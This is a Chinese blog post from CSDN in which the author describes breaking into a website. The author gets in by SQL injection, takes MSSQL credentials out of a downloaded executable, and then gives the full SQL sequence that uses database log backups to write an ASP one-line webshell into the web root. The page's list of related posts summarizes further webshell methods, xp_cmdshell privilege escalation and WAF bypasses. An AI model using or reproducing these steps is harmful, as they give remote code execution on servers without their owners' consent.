利用log备份得到webshell

最新推荐文章于 2022-04-09 23:06:57 发布
最新推荐文章于 2022-04-09 23:06:57 发布
阅读量1.5k 收藏
点赞数
分类专栏: 安全 文章标签: 远程连接 database disk insert cmd image
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/liswa/article/details/638149
版权

经历:通过 ' or ''=' 进入,下载回来一个exe文件的报名器,用ultraedit得到其中的mssql连接密码,是dbowner权限 ,可以远程连接,使用xp_dirtree 'd:/',1,1 得到其web目录,在网上查得一种 log备份得到webshell的技巧

alter database xxxx set RECOVERY FULL
create table cmd (a image)
backup log xxxx to disk = 'd:/web/1.asp' with init
insert into cmd (a) values ('<%If Request("k")<>"" Then Execute(Request("k"))%>')
backup log xxxx to disk = 'd:/web/2.asp'

由于数据库使用时间很长了,log文件很大,执行需要很长时间

之后访问2.asp,删除1.asp,不过,如果目标盘上空间不够,备份就成问题了。

liswa
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
MSSQL 2005 LOG备份webshell的方法
12-15
注:转载就注入出自’孤孤浪子博客’原创 http://itpro.blog.163.com 第一步 http://itpro.blog.163.com/test.asp’;...declare/**/@d/**/nvarchar(4000)/**/select/**/@d=0x640062006200610063006B00/**/backup/**/...
测试成功的log备份webshell代码
02-12
测试成功的log备份webshell代码。 郑重声明:此代码收集于网络,仅用于个人计算机技术学习,用于非法用途者后果自负,本人不承担任何责任和连带责任!
shell_数据库备份webshell
weixin_39648469的博客
01-12 240
测试之前数据库备份webshell算是比较老的web后台才有的一个漏洞,之前也做过类似的,这次偶然有机会帮朋友看来一个类似的站,所以在此分享一下。仅供学习,严守底线。测试开始$ http://xxxxxxx.com/Manage/login.asp登陆界面:帐号密码是弱密码。然后进后台简单的看了看,发现是kindeditor的编辑器,13年的应该是4.1.10,所以之前爆出的漏洞基本不...
数据库备份webshell简单记录
weixin_34306676的博客
09-02 362
数据库备份webshell主要前提是能进入到应用系统后台,并且有数据库备份功能(有点废话了)!当我们想法设法进入到一个系统后台之后,本以为找一个文件上传的地方来上传一个webshell,但是上传点却是限制得死死的,高强度的白名单限制,各种绕过都没有成功,恰巧该系统后台中有数据库备份这个功能,此时我们可以通过数据库备份来拿webshell!首先我们上传...
利用log备份获取WEBSHELL
得峰的专栏 [网络收藏]
05-31 1104
利用log备份获取WEBSHELL 大 | 中 | 小 [ 2006/04/02 20:43 | by NetKnave ] 利用log备份获取WEBSHELL Blog被人渗透了一下,不知道各位掉了什么东西没有。原来有一次blog的目录可以列出来,那次我掉了一个小东西,然后今天别人告诉我NBSI 3用了那个东西的方法……呵呵,有点晕,就是下面的,成功率还是很高的,
备份SQL数据库得到shell的方法:
得峰的专栏 [网络收藏]
05-18 1576
    动画种这种备份的方法来源于n.e.v.e.r的发明使用语句为:use modelcreate table cmd (str image);insert into cmd(str) values ();backup database model to disk=虚拟目录的实际物理目录; 这个方法对数据库角色的权限要求很低,应当有db_backupoperator权限就可以
lOG备份SHELL
c_xxx的专栏
05-04 891
来源: swan dbowner 通过注射得到一个shell应该不是什么难事情了,比较麻烦的是就算利用增量备份,仍然有很多不确定的因素,如果之前别人有过什么错误的写入信息,可能备份出来得到的还是一些不能用的500错误,如何能够提高成功率及重用性呢?如果单从调整增量备份的方式来看,尽管能够达到一些效果,但是方法比较复杂而且效果不明显。加上关于重用性的考虑,例如多次备份的成功率,backupdatab
用MySql备份得到WebShell.pdf
10-10
用MySql备份得到WebShell.pdf
mssql差异备份获得的webshell.doc
07-18
mssql差异备份获得的webshellmssql差异备份获得的webshell
利用Log备份获取Webshell
loyos的专栏
08-08 855
Blog被人渗透了一下,不知道各位掉了什么东西没有。原来有一次blog的目录可以列出来,那次我掉了一个小东西,然后今天别人告诉我NBSI 3用了那个东西的方法……呵呵,有点晕,就是下面的,成功率还是很高的,大家可以试试看。嗯,方法流出去无所谓,文章留着吧。   dbowner通过注射得到一个shell应该不是什么难事情了,比较麻烦的是就算利用增量备份,仍然有很多不确定的因素,如果之前别人有过什
数据库备份批量拿站的WEBSHELL
07-15
数据库备份批量拿站的WEBSHELL数据库备份批量拿站的WEBSHELL数据库备份批量拿站的WEBSHELL数据库备份批量拿站的WEBSHELL
数据库备份webshell
weixin_41657031的博客
01-13 1265
数据库备份webshell 原理 ​ 数据库备份webshell主要前提是能进入到应用系统后台,并且有数据库备份功能。 ​ 当我们想法设法进入到一个系统后台之后,本以为找一个文件上传的地方来上传一个webshell,但是上传点却是限制得死死的,高强度的白名单限制,各种绕过都没有成功,恰巧该系统后台中有数据库备份这个功能,此时我们可以通过数据库备份来拿webshell! ​ 首...
一次差异备份shell过程
weixin_33724059的博客
01-24 531
0x00 前言 扫描器扫到了某个网站存在目录浏览,于是便有了本文。。。 知识点科普: 1. 目录浏览 目录浏览在我个人看来是危害较大的一个漏洞,该漏洞是指“在没有默认文档的目录下,列出该目录下所有文件名及文件信息”,如果站点存在这种错误配置,***者如果知道其中目录名,则可以查看到这些目录下的文件。 2.差异备份条件 站点绝对路径 具有路径写入权限 具备当前数据库权限 0x01 ...
数据库备份---Shell脚本
geng2568的博客
03-18 1588
在一家公司做开发时,在修改bug时,一不小心把数据库中的两张关联表中的数据全部删除了,当时数据还不是特别多,毕竟项目刚上线不久,以前也听说过这种类似的事情,没想到竟然发生在了自己身上,简直太蠢了。后来才编写了shell脚本,每天自动备份数据库中的数据。 一、编写resman.sh脚本内容(这格式备份一个数据库的内容): #!/bin/bash #保存的备份数 number=3 #备份保存路...
shell脚本实现数据库备份
weixin_43808635的博客
04-09 3882
加粗样式@TOC 欢迎使用Markdown编辑器 你好! 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想学习如何使用Markdown编辑器, 可以仔细阅读这篇文章,了解一下Markdown的基本语法知识。 新的改变 我们对Markdown编辑器进行了一些功能拓展与语法支持,除了标准的Markdown编辑器功能,我们增加了如下几点新功能,帮助你用它写博客: 全新的界面设计 ,将会带来全新的写作体验; 在创作中心设置你喜爱的代码高亮样式,Markdown 将代码片显示选择的高亮样式 进行展
渗透之——数据库提权
冰河的专栏
01-04 4807
转载请注明出处:https://blog.csdn.net/l1028386804/article/details/85768994 一、SQL Server提权 1.启用或关闭xp_cmdshell --启用xp_cmdshell USE master EXEC sp_configure 'show advanced options', 1 RECONFIGURE WITH OVER...
SQL log备份WEBSHELL总结
HackCode的专栏
07-26 483
 当SQL注入是得到DB权限时候,接下来可以做的工作很多,象找管理员密码,后台管理这些都可以帮助你拿到WEBSHELL,但是这篇文章讲的是log备份,LOG备份出来的小马的体积小,而且备份的成功的可性很大,所以是我作为对DB权限的第一种试探方法.但是在LOG备份中,我们经常会遇到一些很让我们头痛的问题,那就是闭合的问题,我在这里做个总结,也好让我们对不能闭合的方法有一个全面的了解.1.先介绍下LO
shell备份日志
cxs123678的博客
03-29 1046
先介绍命令crontab 常用选项-u:表示指定某个用户,不加-u选项则为当前用户 -e:表示指定任务计划 -l:表示列出任务计划 -r:表示删除任务计划[root@localhost ~]# crontab -e crontab: no changes made to crontab #输入如下内容: 0 2 * * * echo 'ok' > /root/cron.log 分 时 日 月
破解webshell方法~
热门推荐
KylinKylin的专栏
08-05 1万+
这几天检测学校网站,后台密码都是默认,可是数据库备份路径不可修改啊,一句话什么的完全没有用武之地。用明小子扫扫目录吧,结果发现了前辈的webshell:   本来打算借助大牛的webshell直接进入数据库,省的自己费事了。FST联盟的默认密码是yong,但是这位前辈改了,所以下一个思路是尝试默认密码:admin,123456,admin888,。。。都进不去,看来这位前辈是煞费苦心啊。ok,那
利用webshell流量检测实验演示各种php webshell变形方法绕WAF
最新发布
07-28
对于利用webshell流量检测实验演示各种php webshell变形方法绕WAF的问题,根据引用\[1\]和引用\[2\]的内容,可以提供以下回答: Webshell是一种用于获取对服务器某种程度上的操作权限的工具,而php webshell是一种通过网站端口对网站服务器进行操作的权限。在绕过Web应用程序防火墙(WAF)的过程中,可以采用多种php webshell变形方法。 其中,管理权限拿webshell(进后台)的方法包括正常上传拿webshell、数据库备份webshell、突破本地验证拿webshell、上传其他脚本类型拿webshell、00截断拿webshell利用解析漏洞拿webshell利用编辑器拿webshell、网站配置插马拿webshell、通过编辑模板拿webshell、修改脚本直接拿webshell、数据库命令执行拿webshell、添加静态页面拿webshell、文件包含拿webshell等方法。\[2\] 而普通权限拿webshell(不进后台)的方法包括0day拿webshell、修改网站上传类型配置来拿webshell、IIS写入权限拿webshell、远程命令执行拿webshell、上传漏洞拿webshell、SQL注入拿webshell等方法。\[2\] 综上所述,利用webshell流量检测实验演示各种php webshell变形方法绕WAF的过程中,可以根据具体情况选择适合的方法来绕过WAF的检测。 #### 引用[.reference_title] - *1* [PHP常见过waf webshell以及最简单的检测方法](https://blog.csdn.net/weixin_31900373/article/details/115193111)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^koosearch_v1,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* *3* [拿webshell基础方法总结](https://blog.csdn.net/m0_46230316/article/details/105644775)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^koosearch_v1,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值